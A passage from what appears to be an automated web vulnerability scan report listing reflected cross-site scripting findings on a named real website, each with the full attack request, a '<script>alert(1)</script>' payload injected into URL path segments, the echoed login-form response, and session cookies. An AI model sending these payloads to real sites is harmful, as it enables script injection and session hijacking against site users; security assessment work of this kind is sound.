Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1098e9db0fe9c510b88e7e17fa9c3595"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets645c0"><script>alert(1)</script>40b63ed072a/img/favicon.ico" method="post">
...[SNIP]...

1.24. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01ba"><script>alert(1)</script>918860c39ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/imgc01ba"><script>alert(1)</script>918860c39ed/favicon.ico HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3dadb7e6f1301f5005a30ed580c52755"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/imgc01ba"><script>alert(1)</script>918860c39ed/favicon.ico" method="post">
...[SNIP]...

1.25. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9735e"><script>alert(1)</script>00477431364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/img/favicon.ico9735e"><script>alert(1)</script>00477431364 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-29244c4d7a932ed992f4b452587731c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/img/favicon.ico9735e"><script>alert(1)</script>00477431364" method="post">
...[SNIP]...

1.26. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5992"><script>alert(1)</script>79192fdc272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsc5992"><script>alert(1)</script>79192fdc272/js/easySlider1.7.packed.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-6183b6e18c71236ef619923b826b92d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsc5992"><script>alert(1)</script>79192fdc272/js/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.27. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa16"><script>alert(1)</script>d47c58a6ac3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js2aa16"><script>alert(1)</script>d47c58a6ac3/easySlider1.7.packed.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-771b83200fa6d1c2a1c8ef05ed9c5749"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js2aa16"><script>alert(1)</script>d47c58a6ac3/easySlider1.7.packed.js" method="post">
...[SNIP]...

1.28. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/easySlider1.7.packed.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b695d"><script>alert(1)</script>98bb2971b97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/easySlider1.7.packed.jsb695d"><script>alert(1)</script>98bb2971b97 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.4.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-09f7c8db94b1cc48804bacc6e57df92f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/easySlider1.7.packed.jsb695d"><script>alert(1)</script>98bb2971b97" method="post">
...[SNIP]...

1.29. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d29"><script>alert(1)</script>f8f5c150ce6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets63d29"><script>alert(1)</script>f8f5c150ce6/js/fancybox.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f1d57486057c75ddd83b66302305cb75"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets63d29"><script>alert(1)</script>f8f5c150ce6/js/fancybox.js" method="post">
...[SNIP]...

1.30. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbca"><script>alert(1)</script>025207eb5df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsbbbca"><script>alert(1)</script>025207eb5df/fancybox.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-763008a2a55f2157565075c0f128c3fa"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsbbbca"><script>alert(1)</script>025207eb5df/fancybox.js" method="post">
...[SNIP]...

1.31. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/fancybox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e613"><script>alert(1)</script>3882974db40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/fancybox.js7e613"><script>alert(1)</script>3882974db40 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d3f2f510681c4b32ef1509f391ddc085"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/fancybox.js7e613"><script>alert(1)</script>3882974db40" method="post">
...[SNIP]...

1.32. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fa0"><script>alert(1)</script>9887127cfc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets18fa0"><script>alert(1)</script>9887127cfc0/js/jquery-1.3.2.min.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1e1476c6b78dfdf97e9299633ad5949a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets18fa0"><script>alert(1)</script>9887127cfc0/js/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.33. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b881b"><script>alert(1)</script>93267d4eec5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsb881b"><script>alert(1)</script>93267d4eec5/jquery-1.3.2.min.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-67cf0316f2e36f0cdc359c9a88c63725"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsb881b"><script>alert(1)</script>93267d4eec5/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.34. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb8"><script>alert(1)</script>e6898e9e942 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/jquery-1.3.2.min.js12eb8"><script>alert(1)</script>e6898e9e942 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2aa4647a7396d08e8f4e072a969b484d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/jquery-1.3.2.min.js12eb8"><script>alert(1)</script>e6898e9e942" method="post">
...[SNIP]...

1.35. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 546d8"><script>alert(1)</script>1957a09d746 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets546d8"><script>alert(1)</script>1957a09d746/js/learn_more.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
